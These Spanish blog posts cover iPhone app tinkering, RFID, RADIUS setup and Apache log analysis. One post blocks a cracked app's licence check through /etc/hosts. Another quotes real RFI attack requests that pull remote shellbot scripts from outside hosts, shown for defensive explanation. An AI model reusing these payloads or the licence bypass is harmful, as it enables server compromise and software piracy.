Ultimamente me ha vuelto a picar el gusanillo de la electrónica (trasteando con arduino y demás) así que se me ocurrió buscar aplicaciones del tema para iPhone cuando encontré Elektor Electronic Toolbox.

La App prometía por su descripción pero no era lo suficientemente convincente como para gastarme los 5€ que cuesta sin haberla probado antes, por lo que me dirigí a Installous y la instalé.

Mientras la probaba no paraba de saltarme un aviso que me decía que la App había sido crackeada e isntalada ilegalmente y que por favor la comprase en la AppStore y se cerraba la App para abrirse la AppStore. Bastante molesto, la verdad, así que decidí ver si habría alguna manera de evitar los molestos mensajes.

En una prueba rápida quité Datos, 3G y WiFi del iPhone y ya no me salían mensajes, así que activé el wireshark y observé que es lo que hacía la App de fondo:

1. Query DNS www.roskosch.de.
2. GET /services/check.php?UUID=[UUID del iPhone] a dicho host.
3. Si la respuesta es el comando EXIT; salir del programa mostrando el mensaje que va después del comando.

La respuesta completa que me da es:

EXIT;You Are using a cracked version of Electronic Toolbox. Dont steal my software! Please consider I spent so much time in development and I have to feed my Family with the income of my Apps. If you like to use this App, please go to the AppStore and purchase it. Thanks

De forma que la App se conecta de fondo con el servidor del desarrollador, se descarga un comando y lo ejecuta, todo esto sin preguntarle al usuario y presentando un problema de seguridad en potencia.

Para poder terminar de probarla sin que molestase mas edité el /etc/hosts de mi iPhone y añadí:

127.0.0.1   www.roskosch.de

Así sí que sí, se puede probar la App tranquilamente sin mensajes molestos. Tras probar la App la eliminé de mi iPhone porque no me gusta tener puertas traseras.

Se trata de www.busindre.com, una página que está cerrada por orden judicial.

La conocí cuando salió en las noticias que habían detenido a su dueño y a otro chico, y en ese momento ya estaba ‘cerrada‘.

Tenía curiosidad por saber que había dentro, así que me dirigí a www.archive.org y consulté lo que pude, pero tampoco había mucho. Entonces descubrí que se trataba de un Wordpress, y utilicé el enlace RSS de Wordpress e voilà!, ante mi tenía la primera página completa de busindre (http://www.busindre.com/wp-atom.php).

Pero no era suficiente, así que busqué como cambiar de página pero no encontraba nada en internet. Al final tuve que recurrir al código fuente de Wordpress para descubrir una variable llamada ‘paged‘ con la que se puede cambiar de página, así que ya podía consultar la página completamente a mi antojo.

Pero eso tampoco era suficiente. Siempre estaba la posibilidad de que cualquier día la borrasen por completo o que simplemente cerrasen el acceso por RSS que había descubierto, así que decidí descargarmela:

$ for i in `seq 1 44`; do wget www.busindre.com/wp-atom.php?paged=$i -O page_$i.xml; done

Disfrutad :D

Hará como una semana ojeando rfidiot.org lei que Adam Laurie (el creador de RFIDIOt) había estado jugando con un lector nuevo que además se podia conseguir baratito, compatible hasta cierto punto con las herramientas que se publica en su web y es esta ultima parte de cierta compatibilidad la que me llamó la atención, por lo que me decidí a comprarlo. En cuanto me ha llegado esta mañana me he puesto a jugar con el lector, etiquetas y tarjetas que tenía por aqui, descubriendo varias cosillas cuanto menos interesantes.

Touchatag se trata de un servicio gratuito hasta el momento que pretende enlazar objetos de la vida real con internet, y para eso vende un lector RFID y etiquetas que se pegan a los objetos.

El funcionamiento consiste en que tras definir una accion en la pagina web, por cada objeto que pasamos con una pegatina RFID de touchatag por el lector el servicio que corre en nuestro ordenador leerá el número de serie de la etiqueta, lo mandará por internet al servidor de touchatag y este responderá con una acción definida en la cabecera HTTP Location.

Las acciones solo pueden definirse en su página web, y es necesario instalarse un servicio que está en constante contacto con la página web a través de una conexión segura SSL. No existe manera de definir acciones localmente, por lo que es imprescindible que el ordenador esté conectado a internet, además de tener que guardar nuestros datos y acciones en un servidor ajeno (ya sabeis, el gran hermano…).

Se puede leer mas sobre el lector y las pegatinas de touchatag aqui.

Lo preocupante es cuando encuentras fallos de seguridad concernientes a los datos personales, como expongo a continuación.

(más…)

El objetivo de este artículo es que al final hayamos configurado un acceso seguro a la red WiFi a través de algo tan sencillo como un usuario y una contraseña. Eston son los elementos que tomarán parte:

• WPA: Es el método de acceso que se ha de configurar en el AP (Punto de Acceso).
• TLS: Será nuestro método de cifrado de la información que circule a través de la WiFi.
• MSCHAP: Utilizaremos la implementación de Microsoft del protocolo CHAP para la autenticación por ser el mas extendido.
• RADIUS: Instalaremos un servidor RADIUS que soporte TLS, CHAP y utilice como base de datos MySQL para autenticar a nuestros usuarios.
• MySQL: Será utilizado principalmente para almacenar usuarios y contraseñas.

Se toma como punto de partida que tenemos un Sistema Operativo instalado junto a un servidor MySQL. Este manual está principalmente orientado a Gentoo, aunque puede utilizarse como punto de referencia para otras distribuciones GNU/Linux.

(más…)

Anoche un amigo y yo nos aburriamos y ya que ambos tenemos nuestras páginas en un server propio en casita decidimos echarle un ojo a nuestros registros de apache:

# grep txt access.log | grep -v robots

Al resultado de ejecutar esta busqueda aparecieron numerosas peticiones GET con el contenido ‘txt’ en su interior que llamaban a archivos que no estaban en mi directorio web, si no que eran intentos en su gran mayoría de convertir a un host en un zombie para alguna BotNet mediante algun bug RFI.

Las BotNets (o Red de bots o robots) son comunmente servidores bien privados bien públicos de IRC (Internet Relay Chat) que se emplean como HUBs de Zombies que normalmente se encuentran bajo las órdenes del script kiddie mas inútil que puedas encontrarte.

Un Zombie es una máquina que ha sido comprometida y que ejecuta código malicioso a la espera de instrucciones de su dueño (el “hacker”). Los Zombies que suelen conectar y formar BotNets corren un programa script (mayormente perl) que simula ser una persona que se conecta a un IRC específico y que cumple instrucciones de una determinada persona, normalmente identificada por el nick (pseudónimo) o por el host (Dirección IP).

Estos programas reciben el nombre de Shellbot, ya que son Bots que ejecutan instrucciones en la shell de la maquina víctima.A continuación pongo y enlazo mirrors de algunos bots y RFIs para infectar máquinas que he encontrado en la búsqueda anteriormente descrita:

• 201.130.79.46 – - [05/Apr/2008:19:22:03 +0200] “GET /admin/addons/archive/archive.php?adminfolder=http://w0rms.by.ru/ddos.txt? HTTP/1.1″ 404 539 “-” “libwww-perl/5.79″ “-” [mirror] (ShellBot)
• 72.36.179.98 – - [06/May/2008:01:52:29 +0200] “GET /blog/descargas/bot.txt/port.php?content=http://www.cdpm3.com/id.txt? HTTP/1.1″ 404 539 “-” “libwww-perl/5.810″ “-” [mirror] (RFI)
• 77.48.71.72 – - [08/Jun/2008:16:02:10 +0200] “GET /blog/descargas/bot.txt/port.php?content=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1″ 404 539 “-” “libwww-perl/5.79″ “-” [mirror] (RFI)
• 69.59.184.132 – - [09/Jun/2008:04:16:18 +0200] “GET //viewtopic.php?p=762//viewtopic.php?p=45339//html&highlight=ü7.include($_GET[a]),exit.ü7&a=http://www.patrioticusa.us/poll/…/test2.txt? HTTP/1.1″ 404 308 “-” “Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)” [mirror] (RFI)
• De leer este archivo (el anterior) sale el texto $url.’superscanner2.txt’, se copia el nombre del archivo en la url quedando http://www.patrioticusa.us/poll/…/superscanner2.txt. [mirror] (ShellBot)

Algunos jaquers infectan directamente con un shellbot, otros ejecutan un php para que luego este último ejecute el shellbot o un deface y los que menos saben programar simplemente suben un único script php como este que les deja ejecutar cuanto quieran siempre que PHP esté mal configurado y que se ve así:

A diario estos ataques se automatizan y se suceden ya que muchos de estos ShellBots actuan como gusanos, se copian en el public_html o www de un servidor al que hayan infectado y acto seguido escanean el mundo en busca de mas víctimas a las que infectar, y lo peor es que la gran mayoría de las botnets existentes se emplean para realizar ataques de denegación de servicio distribuidos (DDoS) por lo que hay que tener cuidado y cuidarse las espaldas si eres administrador de alguna página y/o servidor.